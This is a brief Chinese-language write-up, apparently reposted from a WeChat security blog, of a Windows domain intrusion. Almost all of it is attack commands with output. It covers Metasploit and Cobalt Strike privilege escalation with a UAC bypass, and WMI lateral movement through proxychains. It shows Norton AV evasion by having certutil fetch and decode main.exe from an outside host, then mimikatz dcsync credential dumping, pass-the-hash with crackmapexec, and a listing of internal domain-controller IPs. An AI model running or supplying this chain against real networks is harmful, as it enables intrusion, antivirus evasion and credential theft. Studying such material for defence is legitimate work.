前言
Metasploit 特权提权
MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
CS:
创建监听器windows/foreign/reverse_http
执行监听器 spawn msf
run post/multi/recon/local_exploit_suggester
exploit/windows/local/bypassuac_sdclt
MSF:
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set session 3
run
CS:
windows/beacon_http/reverse_http
既然当前 beacon 不是 SYSYEM,而且有了本地管理员的账号hash和明文 ,直接本地 psexec 利用本地 administrator 的密码上线:
内网横向移动
这个时候发现就是一个 SYSTEM 的 Beacon 会话了!但是发现没有域管的进程,结果只能另寻他路!然后用抓到的密码去喷射域内其他主机:
然后可以横向 wmi:
proxychains python3 wmiexec.py -shell-type cmd administrator:password@10.226.0.108 -codec gbk
Bypass 诺顿 AV 上线到 CobaltStrike
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.exe
certutil -encode main.exe main.txt
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.txt
certutil -decode main.txt main.exe
令牌窃取拿到域管
beacon> shell net group "Domain Controllers" /domain
[*] Tasked beacon to run: net group "Domain Controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
The request will be processed at a domain controller for domain inbug.org.
Group name Domain Controllers
Comment All domain controllers in the domain
Members
-------------------------------------------------------------------------------
xxADC01$ 192.168.101.4
xxxxN024$ 192.168.0.20
xxxGN042$ 192.168.0.154
xxxGN043$ 192.168.0.19
xxxGN052$ 192.168.0.14
xxxGN053$ 192.168.0.31
xxSERVER1$ 10.226.0.150
xxPSERVER116$ 10.225.241.149
xxSERVER400$ 192.168.105.5
xxSERVER401$ 192.168.105.6
xxSERVER505$ 10.231.1.15
xxSERVER506$ 10.232.55.60
xxSERVER600$ 10.227.69.108
xxSERVER813$ 10.225.240.16
The command completed successfully.
mimikatz lsadump::dcsync /domain:psnet.com /all /csv
mimikatz lsadump::dcsync /domain:inbug.org /user:Administrator
proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H 4a03985f63e4dxxxxxxx -d inbug.org -x "net user"
此时游戏已经结束了!查看了一下域内进行信息;
execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all
本文始发于微信公众号(InBug实验室):如何打穿几千台机器的内网域渗透?当然是靠 WMI 横向移动了
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论